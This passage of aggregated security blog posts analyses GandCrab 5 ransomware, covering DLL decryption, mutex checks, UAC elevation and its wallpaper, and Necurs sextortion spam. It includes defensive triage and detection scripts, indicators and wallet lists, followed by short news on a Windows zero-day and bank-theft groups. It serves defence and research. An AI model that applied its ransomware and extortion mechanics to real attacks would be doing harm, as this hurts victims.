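    """Restore the 'MZ' signature and verify e_lfanew points at 'PE\\0\\0'.

    The verification keeps random garbage from being mislabelled as a DLL
    just because we wrote two bytes over it."""
    if len(data) < 0x40:
        raise ValueError("too short for a DOS header")
    fixed = b"MZ" + data[2:]
    e_lfanew = struct.unpack_from("<I", fixed, 0x3C)[0]
    if e_lfanew + 24 > len(fixed) or fixed[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError(f"no PE signature at e_lfanew=0x{e_lfanew:x}")
    return fixed


def describe(pe: bytes) -> dict:
    """Pull Machine and Characteristics out of IMAGE_FILE_HEADER."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    machine = struct.unpack_from("<H", pe, e_lfanew + 4)[0]          # Machine
    characteristics = struct.unpack_from("<H", pe, e_lfanew + 22)[0]  # Characteristics
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "size": len(pe),
    }


def recover(blob: bytes) -> dict:
    """Full path: decrypt, fix the header, classify the image."""
    return describe(repair_pe_header(xor_decrypt(blob)))


# --- constructed test data: a DOS header plus a bare IMAGE_FILE_HEADER ---
def build_sample_image(machine: int) -> bytes:
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: right after the DOS header
    file_header = struct.pack("<IHHIIIHH",
                              0x00004550,    # 'PE\0\0'
                              machine, 1, 0, 0, 0, 0, IMAGE_FILE_DLL)
    return bytes(dos) + file_header


def make_embedded_blob(machine: int) -> bytes:
    """Model the on-disk form: MZ trashed, then XOR 0x18 over the whole image."""
    image = bytearray(build_sample_image(machine))
    image[0:2] = b"\xff\xff"
    return xor_decrypt(bytes(image))


if __name__ == "__main__":
    for m in MACHINES:
        print(recover(make_embedded_blob(m)))
```

On a real sample you would carve the two blobs out of the unpacked binary and feed each to recover(); the e_lfanew check is what tells you the XOR key and offset were right, since a wrong key leaves no PE signature where the DOS header says one should be.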

After decryption, the DLL is loaded and runs the exploit. It creates a mutex on the system and a set of pipes to communicate with the main malware: the main binary creates a pipe that the DLL reads later and prepares the strings, among them the mutex name, that the DLL will use.

Preparing the string for the DLL.

The DLL itself carries only placeholder strings, which are replaced with the values the main binary supplies.

Creating the new mutex and relaunching the process.

This mutex is checked when the malware starts. The function returns 1 or 0 depending on whether it can open the mutex. If the mutex can be opened, the malware skips the version check and does not use the two exploits to elevate privileges.

Opening the new mutex to check if there is a need to run the exploits.

If the mutex cannot be opened, the malware checks the operating system version, as GandCrab 4.x did. On Vista or later it queries the TokenIntegrityLevel class and relaunches the binary via ShellExecuteExW with the “runas” verb to gain elevated privileges (which raises a UAC prompt). On Windows XP it skips this step and continues its normal flow.

The main binary never creates this mutex itself; it is created by the DLL loaded through the exploit, so its presence means the exploit stage has already run. The following IDA snippet illustrates the check:

Explaining the check of mutex and exploits.

This version changes the desktop wallpaper. The image is generated at run time and shows the random extension appended to the encrypted files and the user name of the machine. (The ransom note, in text or HTML form, is named <extension_in_uppercase>_DECRYPT.<txt|html>.)

Creating the new wallpaper at runtime.

The username is checked with “SYSTEM.” If the user is “SYSTEM,” the malware puts the name “USER” in the wallpaper.

Checking the name of the user for the wallpaper.

The wallpaper is created in the %TEMP% folder with the name pidor.bmp.

Creating the wallpaper in the temp folder.

The following image shows the strings involved: the wallpaper file name, the string compared against the user name, the format string used for an ordinary user, and the final string used when the user is SYSTEM (with USER in uppercase).

The name of the wallpaper and special strings.

Finally, the wallpaper is set for any user other than SYSTEM:

Changing the wallpaper.

The malware detects the system language, decrypts the matching strings and writes the ransom note in that language.
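The file-system artifacts described in this section (random 5- or 10-letter extension, a ransom note named after that extension in uppercase, and pidor.bmp in %TEMP%) are enough for a first-pass triage on a suspect host. The following is an added example, not McAfee’s code, that runs the checks over a file listing; the listing is constructed, and the script assumes the extension on encrypted files may appear in any case (the analysis only states that the note name is uppercase), so it compares case-insensitively.

```python
"""Triage a file listing for GandCrab 5 artifacts (added example; the
listing is constructed, not from a real incident)."""
import re
from collections import Counter
from typing import Dict, Iterable, List

# Note name from the analysis: <EXT>_DECRYPT.txt|html, EXT = 5 letters (5.0)
# or 10 letters (5.0.2), written in uppercase.
NOTE_RE = re.compile(r"^([A-Z]{5}|[A-Z]{10})_DECRYPT\.(txt|html)$")
WALLPAPER_NAME = "pidor.bmp"   # runtime wallpaper dropped in %TEMP%


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def triage(paths: Iterable[str]) -> dict:
    notes: Dict[str, List[str]] = {}
    ext_counts: Counter = Counter()
    wallpapers: List[str] = []
    for path in paths:
        name = _basename(path)
        m = NOTE_RE.match(name)
        if m:
            # Assumption: files may carry the extension in any case; normalise.
            notes.setdefault(m.group(1).lower(), []).append(path)
            continue
        if name.lower() == WALLPAPER_NAME and "/temp/" in path.replace("\\", "/").lower():
            wallpapers.append(path)
            continue
        if "." in name:
            ext_counts[name.rsplit(".", 1)[1].lower()] += 1

    hits = []
    for ext, note_paths in sorted(notes.items()):
        hits.append({
            "extension": ext,
            "version_hint": "5.0.x (5-letter)" if len(ext) == 5 else "5.0.2 (10-letter)",
            "notes": note_paths,
            "encrypted_files": ext_counts.get(ext, 0),
        })
    return {"hits": hits, "wallpaper": wallpapers, "suspicious": bool(hits or wallpapers)}


# Constructed listing: two encrypted documents, two notes, the wallpaper, noise.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\budget.xlsx.kqzpt",
    r"C:\Users\alice\Documents\KQZPT_DECRYPT.txt",
    r"C:\Users\alice\Pictures\holiday.jpg.kqzpt",
    r"C:\Users\alice\Pictures\KQZPT_DECRYPT.html",
    r"C:\Users\alice\AppData\Local\Temp\pidor.bmp",
    r"C:\Windows\System32\kernel32.dll",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
```

Feed it the output of a recursive directory listing from the host; the extension recovered from the note is what lets you count the damage without touching the registry key the malware may already have deleted.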

Coverage

Customers of McAfee gateway and endpoint products are protected against the latest GandCrab versions. Detection names include Ran-Gandcrabv4! and many others.

An independent researcher, Twitter user Valthek, has also created several vaccines. (McAfee has verified that these vaccines are effective.) The version for GandCrab 4.x through 5.0.2 can prevent the files from being encrypted.

For Version 4.x, the deletion of shadow volumes cannot be avoided but at least the files themselves are kept safe.

For Version 5.x, the vaccine prevents the files from being encrypted but not the creation and setting of the wallpaper, which the malware will still replace. The malware cannot create the random extension used for the encrypted files but will still prepare the string. Running the vaccine a second time removes the wallpaper if it is in the %TEMP% folder.

The vaccine has versions with and without persistence. The version with persistence creates a randomly named file in a special folder and writes a random registry entry so that it runs at each system start. In this case the machine remains protected against this malware (at least in its state as of October 10, and perhaps against future versions).

 

Indicators of compromise

These samples use the following MITRE ATT&CK™ techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs to create or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Discovery of network shares to encrypt them
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges
  • Change wallpaper
  • Flood the network with connections
  • Create mutants

Hashes 

  • e168e9e0f4f631bafc47ddf23c9848d7: Version 5.0
  • 6884e3541834cc5310a3733f44b38910: Version 5.0 DLL
  • 2d351d67eab01124b7189c02cff7595f: Version 5.0.2
  • 41c673415dabbfa63905ff273bdc34e9: Version 5.0.2
  • 1e8226f7b587d6cd7017f789a96c4a65: DLL for 32-bit exploit
  • fb25dfd638b1b3ca042a9902902a5ff9: DLL for 64-bit exploit
  • df1a09dd1cc2f303a8b3d5097e53400b: botnet related to the malware (IP 92.63.197.48)

 

The post Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation appeared first on McAfee Blogs.



The Many Faces of Necurs: How the Botnet Spewed Millions of Spam Emails for Cyber Extortion

The Necurs botnet, a large and well-known spam originator, has become synonymous with cybercrime. Its spam-sending capabilities, through a botnet of a few million infected devices, are frequently dedicated to vast campaigns that deliver banking malware, cryptojacking malware, ransomware and a variety of email scams sent to millions of recipients in each run.

IBM X-Force monitors Necurs activity and recently discovered yet another face of this malspam volcano. This time, Necurs is spewing geotargeted emails designed to threaten and extort payment from those who may have been watching adult movies or possibly having an extramarital affair.

Of course, this spam campaign is yet another wide-cast net from Necurs; the attackers have no idea whether the person they reached actually does any of these things, but the odds appear to pay off anyway. Like other phishing and social engineering scams, it is a numbers game.

Over 30,000 IPs Spewing an Extortion Scam

In Necurs spam campaigns that started around mid-September, X-Force detected millions of emails sent to recipients in different countries, essentially from the same set of malicious IPs and with similar content.

The emails came from over 30,000 different IP addresses, 70 percent of which were dynamic IPs. The attackers demanded that victims pay in bitcoin to one of more than 500 unique wallets. The campaign came in the typical spikes of activity, more marked midweek and then again over the weekend.

Necurs Spam Spikes

Figure 1: Necurs botnet extortion spam — spikes recorded in September 2018 (Source: IBM X-Force)

All of Necurs’ cybercrime campaigns are linked with well-known cybercrime gangs, such as the operators of the Dridex malware, TrickBot, Locky and Monero miners, to name a few. In this case, however, the scammers have little more than a creative email they send around before waiting for the cash to come in. All they are using here is social engineering.

Email content examined by X-Force researchers revealed a number of repeating formats in which the sender falsely claimed to have malware-based control of the recipient’s email accounts and computer. The attackers went on to allege that they had infected adult sites with tracking malware and filmed the victim through his or her webcam while watching content on a supposedly compromised site.

To keep the matter secret, the senders demanded that money be sent to them in bitcoin, asking for an amount between $250 to $550. If they were not paid, the attackers threatened to distribute the supposed video recording to the victim’s contact list, family, co-workers and friends.

In another version of the scam, the attackers claim they have knowledge about an extramarital affair the recipient is engaged in and threaten to send supposed proof of the affair to the victim’s spouse, family, friends and co-workers.

In all cases, the sender has no control of the recipient’s device or webcam, and the entire ploy is a sham. To make the recipient believe otherwise, the spammers added a twist: the “From” header is set equal to the “To” header, so the mail appears to come from the victim’s own account, which seems to confirm that the blackmailer has access to it. The SMTP envelope sender and recipient (the “SMTP-From” and “SMTP-To” values) are set to the same address as well. A self-addressed message that fails SPF, DKIM or DMARC alignment for the recipient’s own domain is therefore a strong indicator of this trick.
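The header trick and the payment demand are both mechanically checkable. The following added example, not IBM X-Force’s code, scores a raw message on the signals this post describes: From equal to To, envelope sender (as recorded by the receiving MTA in Return-Path) equal to From, a bitcoin address in the body, extortion vocabulary, and a language hint from the recipient’s TLD as described further down. The two messages, the keyword list and the TLD entries other than .co.uk, .fr, .de and .ch are constructed for the example; the bitcoin regex checks charset and length only, not the Base58Check checksum.

```python
"""Score a raw email for the Necurs extortion pattern (added example; the
messages, keyword list and most TLD entries are constructed)."""
import email
import re
from email import policy
from email.utils import parseaddr

# Legacy Base58 P2PKH/P2SH and bech32 forms. Charset/length only, no
# checksum validation, so treat a match as a hint, not proof of a wallet.
BTC_RE = re.compile(
    r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{25,59})\b"
)
# .co.uk -> English, .fr -> French, .de/.ch -> German are from the post;
# the remaining entries are assumptions for illustration.
TLD_LANGUAGE = {"co.uk": "en", "fr": "fr", "de": "de", "ch": "de",
                "it": "it", "jp": "ja", "kr": "ko"}
EXTORTION_TERMS = ("webcam", "video", "contacts", "bitcoin", "btc", "affair")


def recipient_tld(address: str) -> str:
    """'alice@example.co.uk' -> 'co.uk'; 'x@mail.example.de' -> 'de'."""
    parts = address.rsplit("@", 1)[-1].lower().split(".")
    if len(parts) >= 3 and parts[-2] in ("co", "com", "ac", "org"):
        return ".".join(parts[-2:])
    return parts[-1]


def analyse(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    hdr_from = parseaddr(msg.get("From", ""))[1].lower()
    hdr_to = parseaddr(msg.get("To", ""))[1].lower()
    env_from = parseaddr(msg.get("Return-Path", ""))[1].lower()
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    text = body.lower()

    self_addressed = bool(hdr_from) and hdr_from == hdr_to
    env_matches = bool(env_from) and env_from == hdr_from
    addresses = BTC_RE.findall(body)
    terms = [t for t in EXTORTION_TERMS if t in text]

    # A self-addressed mail alone is normal (notes to self); require the
    # payment demand as well before calling it extortion spam.
    if self_addressed and addresses:
        verdict = "extortion-spam"
    elif addresses or len(terms) >= 3:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "self_addressed": self_addressed,
        "envelope_matches_from": env_matches,
        "bitcoin_addresses": addresses,
        "extortion_terms": terms,
        "language_hint": TLD_LANGUAGE.get(recipient_tld(hdr_to), "unknown") if hdr_to else "unknown",
        "verdict": verdict,
    }


# Constructed messages; the wallet string is not a real address.
SAMPLE_MESSAGE = b"""\
Return-Path: <alice@example.co.uk>
From: <alice@example.co.uk>
To: <alice@example.co.uk>
Subject: alice - you have been recorded
Content-Type: text/plain; charset=utf-8

I infected your device through an adult site and recorded you via webcam.
Send 0.05 BTC to 1TestAddrTestAddrTestAddrTestAddr within 48 hours or the
video goes to all your contacts.
"""

BENIGN_MESSAGE = b"""\
Return-Path: <bob@example.fr>
From: <bob@example.fr>
To: <alice@example.co.uk>
Subject: lunch
Content-Type: text/plain; charset=utf-8

Still on for Thursday?
"""

if __name__ == "__main__":
    print(analyse(SAMPLE_MESSAGE))
    print(analyse(BENIGN_MESSAGE))
```

The extracted wallet addresses are what you would pivot on next: the same few addresses recurring across thousands of messages, as the post describes, is how the campaign’s takings can be estimated from the outside.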

How Necurs Tailors Its Spam to Recipients’ Local Language

This time, unlike previous campaigns, Necurs is spreading spam in different languages. To deliver the message in the correct language, the email is chosen according to the top-level domain (TLD) of the recipient’s email address. If the domain ends in .co.uk, for example, the email is sent in English, and if it ends in .fr, it is sent in French.

While the campaign included versions of this scam in seven different languages, the overwhelming majority of emails were sent in German and ended up in X-Force spam honeypots when recipient email addresses had a .de or .ch TLD.

Languages touched by this campaign so far include:

  • Arabic;
  • English;
  • French;
  • German;
  • Italian;
  • Japanese; and
  • Korean.

Our researchers were somewhat surprised to see Arabic, Japanese and Korean on the list, since those languages are harder to machine-translate and are rarely targeted by international crooks.

The French email was written by someone who is likely a French speaker, rather than machine-translated as the English version appears to be. This could indicate that some of those involved are based in Europe and possibly collaborating with counterparts in other parts of the world.

Victims Pay Up in Bits

It is unusual to be able to judge the success of a spam campaign from the outside. Security researchers rarely have access to metrics of how many people opened a malicious email, how many went to the phishing site or how many ended up paying the criminals. In this case, however, there is a way to get a general idea because the attackers used bitcoin wallet addresses.

In all, X-Force saw 500 bitcoin addresses used in this campaign; however, most emails pointed to the same few wallets, and the rest were rarely used. It was therefore possible to look up the miscreants’ financial profits via services such as BitRef that let researchers check bitcoin wallet balances. While we did not check every wallet, we did want to see whether the attackers were getting any money.

We spot-checked the top 20 bitcoin addresses used in the campaign. As an example, one of the addresses that appeared in over 3 million email messages sent to German recipients amassed 0.52 BTC, which was equal to about $3,300 as of September 20, 2018. That wallet never got any more money and stopped receiving coins on September 19. The situation was similar for the other frequently used wallets in the campaign:

Wallet address                        BTC received   Value in USD*
16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7    0.52           $3,396.64
14dEvzyftZjrTjXaX5XXHo65C1rdsqCw1s    0.2            $1,306.40
1MZHWpgmUyjmExofPDCmYuVz9kmnTpu6m     0.6798768      $4,440.96
1KxCvtggcPd7c9UtUxYkJW2AwCQMknJkth    0.39944001     $2,609.14
16acVRG2RdMDSmdVuve1N1bYBFu8Rr3iii    0.51897787     $3,389.96
18firbfmx4KoNeM4cBhcDdXgp2Aiduo43G    0.9347217      $6,105.60
1CSsVgPgwTNLGgQCHRBPa7ZNH7oxK9cf2k    0.47608621     $3,109.80
1CXup5BRrEFuBHDeQcduCvfu3P48rXHrck    0.7268406      $4,747.72
1LXxZyP7CKybaXA6jELu5YJ6UQzbdZz8RP    1.02088739     $6,668.44
1MuQXHNBcAbYyMvMsvHfnXdymeuoLAK14Z    0.37842439     $2,471.87
398Qz1Autx6HJbJwvejXVhw4mXAmBW2KsW    0.15042        $982.54
19fbsopNBC77qYTVaX6iqg3cWZAHhxD8WC    0.33308602     $2,175.72
16QR5HMNvxoAT8tCFM3VxLnawYSkWujUwH    0.11703859     $764.50
1NpazNoJJPwVRP1ipwcqXspinJtouHfAe1    0.37208738     $2,430.47
12gUsSh9BU4m9ioAykSHXXZRTdEDT6tkca    0.08542991     $558.03
1HGenT4A43kd3rpYCTEzpWpJdxhRB2T1qN    0.15504966     $1,012.78
1GzLBHTSuDP5L7aCYPRFJwtqrXNdUbsFpf    0.02972966     $194.19
1JsMFmiAUowGhUWGfmnyfvqsWC7CLEmDWS    0.0198436      $129.62
1B9LFUAYAuwSrvBwCLrRQjR1iw53oG4S39    0.02250995     $147.03
12RZQCLuA3dFM1e5omdBAJ2Rr8LmF9acS7    0.10786085     $704.55
19rq65nR7FqvEgeq3r8YmHGupsUvnD3pmD    0.44241526     $2,889.86
19GqTJDhu7A1qg7rnK3KS7tmCkCTMTz6xD    0              –
19u9GzkHDJneny3GybvLW2ZKYx3tT98w24    0              –

* BTC to USD exchange rate on October 4, 2018.

The bitcoin received by the wallets listed above totals about $50,000. Some wallets are still actively receiving coins. Most show withdrawals that bring the balance to zero, meaning the attackers have been moving the coins to another wallet or cashing them out.
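As an added example, not taken from the X-Force article, the Python below does the offline half of that wallet analysis: it pulls candidate legacy Bitcoin addresses out of a batch of message bodies with a regular expression, verifies each one’s Base58Check checksum so that typos and extraction errors are not counted as wallets, and tallies how many messages mention each address (one vote per message, so a body that repeats the address does not inflate the count). The messages are constructed for the example; `16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7` is the top address from the table above, and `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` is the Bitcoin genesis-block address, used here only as a second publicly known valid address. Balance lookups (BitRef or a block explorer) are a separate, online step the script deliberately does not perform.

```python
import hashlib
import re
from collections import Counter

# Legacy (Base58Check) Bitcoin addresses: P2PKH starts with '1', P2SH with '3'.
# Bech32 "bc1..." addresses are out of scope for this example.
BTC_ADDRESS_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed sample messages. The first address is the most-used wallet from
# the X-Force table; the second is the Bitcoin genesis-block address, used
# here only because it is publicly known to be valid. The fourth message
# carries that address with its last character altered (a deliberate typo).
SAMPLE_MESSAGES = [
    "I have a video of you. Send $500 in bitcoin to 16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7 within 48 hours.",
    "Your account was hacked. Pay to 16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7 or the video goes to all contacts.",
    "Pay 0.05 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa. My wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
    "Send to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb (last character altered: checksum must fail)",
    "Wallet 16yJ7MQWTFNjsSvAJJMkjPpnJbAsGLYhW7 - you have 2 days.",
]


def b58decode(text):
    """Decode a Base58 string to bytes, preserving leading zero bytes ('1's)."""
    value = 0
    for ch in text:
        value = value * 58 + B58_ALPHABET.index(ch)  # ValueError on a bad char
    leading_zeros = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_zeros + body


def is_valid_btc_address(addr):
    """True if addr decodes to 25 bytes whose last 4 equal the double-SHA256 checksum."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def extract_addresses(text):
    """Return every address-shaped token in the text (not yet checksum-verified)."""
    return BTC_ADDRESS_RE.findall(text)


def tally_wallets(messages):
    """Per address: how many messages mention it, and whether its checksum is valid."""
    counts = Counter()
    for body in messages:
        for addr in set(extract_addresses(body)):  # one vote per message
            counts[addr] += 1
    return {addr: {"messages": n, "valid": is_valid_btc_address(addr)}
            for addr, n in counts.most_common()}


if __name__ == "__main__":
    for addr, info in tally_wallets(SAMPLE_MESSAGES).items():
        print(f"{addr}  messages={info['messages']}  valid_checksum={info['valid']}")
```

Addresses that fail the checksum are still reported rather than dropped, because a malformed address in a spam template is itself a useful clustering feature even though it can never receive funds.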

Phishing Is Phishing — Don’t Take the Bait

October is National Cyber Security Awareness Month (NCSAM) in the U.S., making it a great opportunity to remind employees, family and friends to polish up on some information security basics, especially those related to email.

Put simply, you should always avoid opening unsolicited email. This can minimize the opportunity to fall for a social engineering scam. These communications are carefully crafted to lure people to take action, especially if they trigger an emotional reaction such as fear, urgency or, in this case, embarrassment.

You should also enable email filtering on your accounts to prevent most spam from getting through. Keep your devices clear of malware, run an up-to-date antivirus program and, if ever in doubt, have them examined by a professional.

If possible, use a separate device for online banking and other activities that involve the transfer of sensitive information. In general, adult content websites are known for high traffic and therefore are often a target for cybercriminals, which helped lend this scam some added credibility.

Visit the X-Force Exchange to learn more about this campaign. For tips to keep yourself safe from online scams and malware, check out the FBI’s Internet Crime Complaint Center (IC3) and StaySafeOnline.

The post The Many Faces of Necurs: How the Botnet Spewed Millions of Spam Emails for Cyber Extortion appeared first on Security Intelligence.

CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.

The vulnerability, tracked as CVE-2018-8453, is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw stems from the way the Win32k component of Windows handles objects in memory.

Discovered by experts from Kaspersky Lab, it can be exploited by an attacker who already has local access (an authenticated user) to run code in kernel mode and take control of the affected system.

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor´s activity has been slowly increasing during the last two years.

The zero-day exploit was embedded in the first stage of a malware installer used by the group to escalate privileges on the target machine and gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability, CVE-2017-0263, which Microsoft fixed in May 2017 and which had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against fewer than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

Attribution was possible because the attack deployed a PowerShell backdoor previously used exclusively by the FruityArmor APT. Experts also confirmed an overlap in C2 infrastructure between this campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.

Pierluigi Paganini

(Security Affairs – FruityArmor, CVE-2018-8453)

The post CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East appeared first on Security Affairs.


Shocking: Hackers using Googlebots in cryptomining malware attacks

By Waqas

Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search Results to distribute Zeus Panda banking trojan. Now, researchers at F5 identified a strange and infrequent behavior […]

This is a post from HackRead.com Read the original post: Shocking: Hackers using Googlebots in cryptomining malware attacks

Blog | Avast EN: Avast pumps protection, performance, and privacy in 2019 | Avast

The tech world evolves. The ones who wear black hats get smarter, and the ones who wear white hats get even smarter. Using AI, machine learning, and the big data of our vast network, we’re proud to be forerunners in the latter category, staying a step ahead of the cybercrime underworld. We not only test our products rigorously in our own labs, but we submit them for objective third-party evaluations to learn where we can improve. Reviews have been favorable throughout 2018 and we continue to offer the best free and most competitive and feature rich antivirus products on the market.

Avast Free Antivirus 2018 for Windows received the Top Product award from AV-Test. The Avast 2019 product line-up adds more features.

Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector.

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT groups; however, stolen money is not the most dangerous thing that could happen to a financial organization,” says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups specialized in sabotage. One successful attack is capable of destroying a financial organization and even collapsing a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks: active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they withdrew $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing on ATMs and card processing has reduced the average damage from a single attack, but it makes the cash-out safer for the “drops” who collect the stolen money: the attackers are in one country, the victim bank in another, and the cashing out is done in a third.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies; no attempts were made in 2018. In one of these attacks they were helped by members of the group Anunak, which had not conducted an attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers: the decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that steal from individuals using banking Trojans for PCs. This decline in PC banking Trojan activity has been under way in Russia since 2012.

At present, only three criminal groups, Buhtrap2, RTM, and Toplel, steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: Trojans were no longer distributed through traditional malicious campaigns or hacked popular sites, but through newly created resources tailored to accountants and company executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On these fake resources, the criminals placed code designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among them, BackSwap stands out: it initially attacked only banks in Poland, then moved on to banks in Spain, and it implemented several new techniques at once for injecting code that automatically replaces payment details. The greatest threat to bank customers still comes from the criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of Android Trojan infections on smartphones, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average theft decreased from $164 to $104. New Android Trojans put up for sale or hire on hacker forums, among them Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker and Sagawa, are primarily intended for use outside Russia. An exception is the malware Banks in Your Hand, a Trojan disguised as a financial app that posed as an “aggregator” of the mobile banking systems of Russia’s leading banks. It stole between $1,500 and $7,500 from users every day until March 2018, when, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in damage to customers is the introduction by banks and payment systems of early fraud detection technologies based on behavioral analysis. These can detect attacks that combine social engineering, phishing, botnets, illegal cash-out networks and fraud across multiple channels, as well as other types of banking fraud, on all customer devices and platforms.

